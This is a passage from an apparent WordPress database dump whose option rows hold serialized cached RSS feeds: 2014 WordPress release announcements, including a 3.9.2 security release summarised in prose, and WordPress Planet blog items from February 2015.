Candidate\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 27 Aug 2014 12:20:37 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3287\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:321:\"The first release candidate for WordPress 4.0 is now available! In RC 1, we’ve made refinements to what we’ve been working on for this release. Check out the Beta 1 announcement post for more details on those features. We hope to ship WordPress 4.0 next week, but we need your help to get there. If you […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2134:\"<p>The first release candidate for WordPress 4.0 is now available!</p>\n<p>In RC 1, we’ve made refinements to what we’ve been working on for this release. Check out the <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">Beta 1 announcement post</a> for more details on those features. We hope to ship WordPress 4.0 <em>next week</em>, but we need your help to get there. If you haven’t tested 4.0 yet, there’s no time like the present. (Please, not on a production site, unless you’re adventurous.)</p>\n<p><strong>Think you’ve found a bug? </strong>Please post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area in the support forums</a>. If any known issues come up, you’ll be able to <a href=\"https://core.trac.wordpress.org/report/5\">find them here</a>.</p>\n<p>To test WordPress 4.0 RC1, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-RC1.zip\">download the release candidate here</a> (zip). If you’d like to learn more about what’s new in WordPress 4.0, visit the awesome About screen in your dashboard (<strong><img src=\"https://i0.wp.com/core.svn.wordpress.org/branches/3.6/wp-content/themes/twentyten/images/wordpress.png?w=692\" alt=\"\" width=\"16\" height=\"16\" /> → About</strong> in the toolbar).</p>\n<p><strong>Developers,</strong> please test your plugins and themes against WordPress 4.0 and update your plugin’s <em>Tested up to</em> version in the readme to 4.0 before next week. If you find compatibility problems, please be sure to post any issues to the support forums so we can figure those out before the final release. You also may want to <a href=\"https://make.wordpress.org/core/2014/08/21/introducing-plugin-icons-in-the-plugin-installer/\">give your plugin an icon</a>, which we launched last week and will appear in the dashboard along with banners.</p>\n<p><em>It is almost time</em><br />\n<em> For the 4.0 release</em><br />\n<em> And its awesomeness</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wordpress.org/news/2014/08/wordpress-4-0-release-candidate/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:8;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:20:\"WordPress 4.0 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:65:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 15 Aug 2014 05:06:19 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3280\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:353:\"The fourth and likely final beta for WordPress 4.0 is now available. We’ve made more than 250 changes in the past month, including: Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes. Better handling of small screens in the media library modals. A separate bulk selection mode […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Helen Hou-Sandi\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2003:\"<p>The fourth and likely final beta for WordPress 4.0 is now available. We’ve made <a href=\"https://core.trac.wordpress.org/log?rev=29496&stop_rev=29229&limit=300\">more than 250 changes</a> in the past month, including:</p>\n<ul>\n<li>Further improvements to the editor scrolling experience, especially when it comes to the second column of boxes.</li>\n<li>Better handling of small screens in the media library modals.</li>\n<li>A separate bulk selection mode for the media library grid view.</li>\n<li>Improvements to the installation language selector.</li>\n<li>Visual tweaks to plugin details and customizer panels.</li>\n</ul>\n<p><strong>We need your help</strong>. We’re still aiming for a release this month, which means the next week will be critical for identifying and squashing bugs. If you’re just joining us, please see <a href=\"https://wordpress.org/news/2014/07/wordpress-4-0-beta-1/\">the Beta 1 announcement post</a> for what to look out for.</p>\n<p><strong>If you think you’ve found a bug</strong>, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta\">Alpha/Beta area</a> in the support forums, where friendly moderators are standing by. <b>Plugin developers</b><strong>,</strong> if you haven’t tested WordPress 4.0 yet, now is the time — and be sure to update the “tested up to” version for your plugins so they’re listed as compatible with 4.0.</p>\n<p><strong>This software is still in development,</strong> so we don’t recommend you run it on a production site. Consider setting up a test site just to play with the new version. To test WordPress 4.0, try the <a href=\"https://wordpress.org/extend/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (you’ll want “bleeding edge nightlies”). Or you can <a href=\"https://wordpress.org/wordpress-4.0-beta4.zip\">download the beta here</a> (zip).</p>\n<p><em>We are working hard</em><br />\n<em>To finish up 4.0<br />\n</em><em>Will you help us too?</em></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"https://wordpress.org/news/2014/08/wordpress-4-0-beta-4/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:9;a:6:{s:4:\"data\";s:45:\"\n \n \n \n \n \n \n \n\n \n \n \n \n \n \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"WordPress 3.9.2 Security Release\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:51:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 06 Aug 2014 19:04:27 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Security\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"http://wordpress.org/news/?p=3269\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:377:\"WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately. This release fixes a possible denial of service issue in PHP’s XML processing, reported by Nir Goldshlager of the Salesforce.com Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress […]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Andrew Nacin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:2353:\"<p>WordPress 3.9.2 is now available as a security release for all previous versions. We strongly encourage you to update your sites immediately.</p>\n<p>This release fixes a possible denial of service issue in PHP’s XML processing, reported by <a href=\"https://twitter.com/nirgoldshlager\">Nir Goldshlager</a> of the Salesforce.com Product Security Team. It was fixed by Michael Adams and Andrew Nacin of the WordPress security team and David Rothstein of the <a href=\"https://www.drupal.org/SA-CORE-2014-004\">Drupal security team</a>. This is the first time our two projects have coordinated joint security releases.</p>\n<p>WordPress 3.9.2 also contains other security changes:</p>\n<ul>\n<li>Fixes a possible but unlikely code execution when processing widgets (WordPress is not affected by default), discovered by <a href=\"http://www.buayacorp.com/\">Alex Concha</a> of the WordPress security team.</li>\n<li>Prevents information disclosure via XML entity attacks in the external GetID3 library, reported by <a href=\"http://onsec.ru/en/\">Ivan Novikov</a> of ONSec.</li>\n<li>Adds protections against brute attacks against CSRF tokens, reported by <a href=\"http://systemoverlord.com/\">David Tomaschik</a> of the Google Security Team.</li>\n<li>Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators.</li>\n</ul>\n<p>We appreciated responsible disclosure of these issues directly to our security team. For more information, see the <a href=\"https://codex.wordpress.org/Version_3.9.2\">release notes</a> or consult the <a href=\"https://core.trac.wordpress.org/log/branches/3.9?stop_rev=29383&rev=29411\">list of changes</a>.</p>\n<p><a href=\"https://wordpress.org/download/\">Download WordPress 3.9.2</a> or venture over to <strong>Dashboard → Updates</strong> and simply click “Update Now”.</p>\n<p>Sites that support automatic background updates will be updated to WordPress 3.9.2 within 12 hours. (If you are still on WordPress 3.8.3 or 3.7.3, you will also be updated to 3.8.4 or 3.7.4. We don’t support older versions, so please update to 3.9.2 for the latest and greatest.)</p>\n<p>Already testing WordPress 4.0? The third beta is <a href=\"https://wordpress.org/wordpress-4.0-beta3.zip\">now available</a> (zip) and it contains these security fixes.</p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2014/08/wordpress-3-9-2/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}s:27:\"http://www.w3.org/2005/Atom\";a:1:{s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:0:\"\";s:7:\"attribs\";a:1:{s:0:\"\";a:3:{s:4:\"href\";s:32:\"https://wordpress.org/news/feed/\";s:3:\"rel\";s:4:\"self\";s:4:\"type\";s:19:\"application/rss+xml\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:44:\"http://purl.org/rss/1.0/modules/syndication/\";a:2:{s:12:\"updatePeriod\";a:1:{i:0;a:5:{s:4:\"data\";s:6:\"hourly\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:15:\"updateFrequency\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:9:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Mon, 16 Feb 2015 21:07:44 GMT\";s:12:\"content-type\";s:23:\"text/xml; charset=UTF-8\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:10:\"x-pingback\";s:37:\"https://wordpress.org/news/xmlrpc.php\";s:13:\"last-modified\";s:29:\"Thu, 18 Dec 2014 18:57:51 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 249\";}s:5:\"build\";s:14:\"20150216205945\";}','no'),
(109,'_transient_timeout_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1424164064','no'),
(110,'_transient_feed_mod_ac0b00fe65abe10e0c5b588f3ed8c7ca','1424120864','no'),
(111,'_transient_timeout_feed_d117b5738fbd35bd8c0391cda1f2b5d9','1424164065','no'),
(112,'_transient_feed_d117b5738fbd35bd8c0391cda1f2b5d9','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:61:\"\n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"WordPress Planet\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:2:\"en\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"WordPress Planet - http://planet.wordpress.org/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:50:{i:0;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"WPTavern: Tickets On Sale For WordCamp North Canton, OH, 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=39054\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"http://wptavern.com/tickets-on-sale-for-wordcamp-north-canton-oh-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2149:\"<p> </p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/WCNorthCanton2015FeaturedImage.png\" rel=\"prettyphoto[39054]\"><img class=\"aligncenter size-full wp-image-39055\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/WCNorthCanton2015FeaturedImage.png?resize=650%2C314\" alt=\"WordCamp North Canton 2015 Featured Image\" /></a>Tickets are <a title=\"http://northcanton.wordcamp.org/2015/tickets/\" href=\"http://northcanton.wordcamp.org/2015/tickets/\">on sale</a> for the 3rd annual, WordCamp North Canton, OH, May 8th-9th. Tickets are available for Friday and Saturday, Friday only, or Saturday only. <span class=\"tix-ticket-excerpt\">Friday features a full day of learning split between entrepreneur and WordPress sessions. Saturday is a full day of WordPress sessions with breakfast and lunch included in the ticket price. Ticket prices are as follows:</span></p>\n<ul>\n<li>$30 Friday and Saturday</li>\n<li>$20 Friday only</li>\n<li>$20 Saturday only</li>\n</ul>\n<p>The event takes place on the <a title=\"http://www.starkstate.edu/\" href=\"http://www.starkstate.edu/\">Stark State College campus</a> within the business and entrepreneurial center. As I <a title=\"http://wptavern.com/recap-of-wordcamp-north-canton-2014\" href=\"http://wptavern.com/recap-of-wordcamp-north-canton-2014\">mentioned last year</a>, the venue has high-speed internet so WiFi shouldn’t be a problem. Joe Rozsa, who is helping to organize the event, says lunch will be provided by <a title=\"http://www.solpiepizza.com/\" href=\"http://www.solpiepizza.com/\">SOL Pie Pizza</a>, formerly known as <a title=\"http://ermannospizza.com/\" href=\"http://ermannospizza.com/\">Ermannos Pizza</a>.</p>\n<p>Speakers have yet to be confirmed, but I’ll be participating on a panel discussion on <a title=\"http://wordpress.tv/2014/02/14/chris-lema-escaping-the-impostor-syndrome/\" href=\"http://wordpress.tv/2014/02/14/chris-lema-escaping-the-impostor-syndrome/\">imposter syndrome</a>. We’re going to share our experiences battling the syndrome on a daily basis and give advice on how to avoid its influence. Let me know if you plan on attending.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Feb 2015 20:18:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Jonathan Ive Profile\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44703\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/jonathan-ive-profile/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2030:\"<blockquote><p>Jobs’s taste for merciless criticism was notorious; Ive recalled that, years ago, after seeing colleagues crushed, he protested. Jobs replied, “Why would you be vague?,” arguing that ambiguity was a form of selfishness: “You don’t care about how they feel! You’re being vain, you want them to like you.” Ive was furious, but came to agree. “It’s really demeaning to think that, in this deep desire to be liked, you’ve compromised giving clear, unambiguous feedback,” he said. He lamented that there were “so many anecdotes” about Jobs’s acerbity: “His intention, and motivation, wasn’t to be hurtful.”</p></blockquote>\n<p>Your one #longread today should be <a href=\"http://www.newyorker.com/magazine/2015/02/23/shape-things-come\">the New Yorker’s profile of Jonathan Ive</a> by Ian Parker. This anecdote resonated with me from the time I (poorly) did design for a living, and how much patience and stoicism are part of the job when working with a deciding stakeholder, often known as a client:</p>\n<blockquote><p>Bob Mansfield, a former senior hardware engineer at Apple, who is now semi-retired, recently described the pique that some colleagues felt about Ive’s privileged access. As he put it, “There’s always going to be someone vying for Dad’s attention.” But Mansfield was grateful for Ive’s cool handling of a C.E.O. who was “not the easiest guy to please.” Mansfield’s view was “Jony puts up with a lot, and, as a result of him doing it, people like me don’t have to.”</p></blockquote>\n<p>This also made me giggle.</p>\n<blockquote><p>Brunner is proud of the Beats brand, but it took him time to adjust to a design rhythm set as if for a sneaker company: “Originally, I hated it—‘Let’s do a version in the L.A. Lakers’ colors!’ ” He laughed. “ ‘Great. Purple and yellow. <em>Fantastic</em>.’ ”</p></blockquote>\n<p><a href=\"http://www.newyorker.com/magazine/2015/02/23/shape-things-come\">Check out the entire thing</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 16 Feb 2015 16:01:51 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"Matt: Pollan on Psychedelics\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44682\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://ma.tt/2015/02/pollan-on-psychedelics/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:643:\"<p>To make it a full New Yorker weekend, here’s a <a href=\"http://longreads.com/\">longread</a> from <a href=\"http://michaelpollan.com/\">Michael Pollan</a>, best known for his 